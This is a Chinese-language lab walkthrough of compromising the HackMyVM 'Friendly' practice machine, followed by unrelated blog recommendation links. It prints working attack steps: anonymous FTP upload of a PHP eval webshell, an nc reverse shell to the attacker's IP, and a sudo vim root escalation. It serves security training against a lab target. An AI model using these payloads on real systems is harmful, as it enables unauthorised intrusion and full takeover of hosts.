friendly靶机渗透

笔记于2025/12/1

参照HakcMyVM/Friendly.md at master · pencek/HakcMyVM · GitHub进行复现

靶机介绍:

FTP服务匿名、WEBSHLL上传、vim提权

攻击机IP:192.168.161.139

靶机IP:192.168.161.140

端口扫描

得知开放FTP服务和WEB应用协议

复制代码
nmap -p- 192.168.161.140

详细信息检测

有匿名账户

复制代码
nmap -p21,80 -A 192.168.161.140

WEB渗透测试

网站首页

目录扫描

只有index.html页面

复制代码
gobuster dir -w /usr/share/wordlists/dirbuster-list-2.3-medium.txt -u http://192.168.161.140/ -x php,html,txt -e

FTP服务

复制代码
ftp 192.168.161.140 
#输入账户anonymous,匿名账户没有密码直接回车,继续输入 
ls -al 
#发现跟目录扫描出来一个框架

上传webshell

复制代码
<?php eval($_POST['x']);?>

上传

复制代码
put rce.php

攻击机开启监听

蚁剑连接webshell,终端执行命令

复制代码
nc -e /bin/bash 192.168.161.139 6666

内网渗透

拿到user.txt

信息收集

复制代码
sudo -l

内网提权

复制代码
https://gtfobins.github.io/gtfobins/vim/#sudo

执行提权命令

复制代码
sudo /usr/bin/vim -c '!/bin/bash'

拿到root.txt,这里的/root/root.txt是假的flag

复制代码
find / -type f -name 'root.txt'

渗透测试收获

FTP匿名登录体验和FTP服务基本命令、新的提权vim提权

相关推荐
●VON6 小时前
鸿蒙 PC Markdown 编辑器内部隐私与安全评审
安全·华为·编辑器·harmonyos·鸿蒙
故乡de云6 小时前
AWS 添加付款方式失败排查清单:卡片、银行风控与账号状态逐项定位
开发语言·php
我不是QI7 小时前
一、主持人信息(域名 网站资产情报搜集)原理解析
安全·网络安全
txg6667 小时前
网络安全领域简报(2026年7月14日—20日)
安全·web安全
梦梦代码精7 小时前
基于ThinkPHP6 + Vue3的家政预约系统全解析:从LBS定位到自动派单的完整实现
java·docker·开源·php·代码规范
郑州光合科技余经理8 小时前
家政O2O平台解析:从0搭建上门预约小程序解决方案
android·java·开发语言·前端·小程序·架构·php
玖玥拾8 小时前
Unity 3D 笔记(十一)UI 框架进阶:栈弹窗交互、BasePanel 基类虚方法、DoTween 界面动画
笔记·3d·unity
FellAveal8 小时前
【Go语言入门学习笔记】Part13.结构体与接口
笔记·学习·golang
学计算机的计算基8 小时前
回溯算法下篇:四道经典题讲透约束剪枝、原地标记、预计算与状态压缩
java·笔记·算法
雷工笔记8 小时前
Ubuntu迁移记录
笔记·ubuntu